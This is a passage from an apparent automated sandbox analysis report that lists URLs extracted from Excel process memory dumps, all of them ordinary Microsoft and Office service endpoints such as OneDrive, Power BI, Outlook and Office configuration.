      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netp
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.onedrive.com
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comMBI
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/beta/myorg/importso
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groupsBearer
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groupsD
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/ne
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/OneNoteBulletinshttps://
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://augloop.office.com
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://augloop.office.com/v2
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2)V
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2Bearer
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.com/v2https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.673858565.0000000012B6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867922185.0000000012B6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965640481.0000000012B6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770909754.0000000012B6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673710920.0000000012B6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870409660.0000000012B6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869169983.0000000012B6D000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.
      Source: EXCEL.EXE, 00000000.00000003.674210580.000000000F038000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965069920.000000000F178000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674386257.000000000F183000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826754049.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869975155.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678502130.000000000F183000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829204148.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.826190690.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770810330.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.811332568.000000000F173000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678232726.000000000F183000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://cdn.entity.
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsellSkyDriveSignUpUpsellImageht
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellLiveProfileServicehttps
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellb
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/abTranslatorServicehttps://ogma.osi.offic
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://clients.config.office.net/
      Source: EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/Bearer
      Source: EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/https://login.windows.net/common/oauth2/authorize
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policieshttps://login.windows.net/common/oauth2/
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/iosBearer
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ioshttps://login.windows.net/common/oauth2/authorize
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/macBearer
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/machttps://login.windows.net/common/oauth2/authorize
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey5
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey=3
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyBearer
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyhttps://login.windows.net/common/oau
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/em
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxY
      Source: EXCEL.EXE, 00000000.00000003.673843716.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673700420.0000000012B56000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://config.edge.skype.com
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://cortana.ai
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://cortana.ai/api
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apiBearer
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietl
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://cr.office.com
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/9
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comD
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comly
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comv
      Source: EXCEL.EXE, 00000000.00000002.965387806.00000000129FC000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965309540.00000000129A0000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesBearer
      Source: 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://dev.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.aiBearer
      Source: EXCEL.EXE, 00000000.00000003.673746154.0000000012BC0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.674134785.0000000012BC5000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.aihttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: EXCEL.EXE, 00000000.00000003.674066068.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870185150.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673760720.0000000012BF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770968984.0000000012BD5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965770716.0000000012BE9000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/#
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: EXCEL.EXE, 00000000.00000002.965595762.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673690971.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673980862.0000000012B46000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.867887327.0000000012B2D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.770875637.0000000012B42000.00000004.00000001.sdmpString found in binary or memory: https://dev0-api.acompli.net/autodetect4
      Source: EXCEL.EXE, 00000000.00000003.673610743.0000000012A89000.00000004.00000001.sdmp, 0E1DCC09-05B4-4691-AA45-316DEEA02104.0.drString found in binary or memory: https://devnull.onenote.com
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comBearer
      Source: EXCEL.EXE, 00000000.00000003.673968944.0000000012B2E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.673679757.0000000012B2E000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comMBI_SSL_SHORT
